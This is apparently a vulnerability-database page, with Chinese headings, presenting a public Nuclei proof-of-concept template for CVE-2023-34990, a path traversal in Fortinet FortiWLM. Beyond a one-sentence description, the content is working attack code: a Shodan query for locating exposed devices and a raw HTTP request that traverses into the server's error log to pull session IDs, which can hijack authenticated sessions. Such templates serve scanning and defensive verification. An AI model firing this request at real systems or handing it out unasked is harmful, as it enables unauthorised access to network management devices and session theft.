漏洞描述
A relative path traversal in Fortinet FortiWLM version 8.6.0 through 8.6.5 and 8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands via specially crafted web requests.
CVE-2023-34990: FortiWLM - Directory Traversal
PoC代码[已公开]
id: CVE-2023-34990
info:
name: FortiWLM - Directory Traversal
author: DhiyaneshDk
severity: critical
description: |
A relative path traversal in Fortinet FortiWLM version 8.6.0 through 8.6.5 and 8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands via specially crafted web requests.
reference:
- https://fortiguard.com/psirt/FG-IR-23-144
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-34990
cwe-id: CWE-94,CWE-23
epss-score: 0.29866
epss-percentile: 0.96462
metadata:
max-request: 1
shodan-query: title:"FortiWLM Login"
tags: cve,cve2023,fortiwlm,lfi,cisa,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET /wlm/login?next=/wlm HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
internal: true
dsl:
- 'status_code == 200'
- 'contains(body, "<title>FortiWLM Login</title>")'
condition: and
- raw:
- |
GET /ems/cgi-bin/ezrf_lighttpd.cgi?op_type=upgradelogs&imagename=../../../../../../../../../data/apps/nms/logs/httpd_error_log HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
part: response
regex:
- 'sessionid=([A-F0-9]+)'
- type: status
status:
- 200
# digest: 490a0046304402203044d5b0f658a4c4199d62249763717d0ae6c62c5a86d502c02cb6d8ce7897e502200e9d9ff7eee4c5e47460970ebb4bade212d8f7dacbd2360cd3e3abc2a2e97002:922c64590222798bb761d5b6d8e72950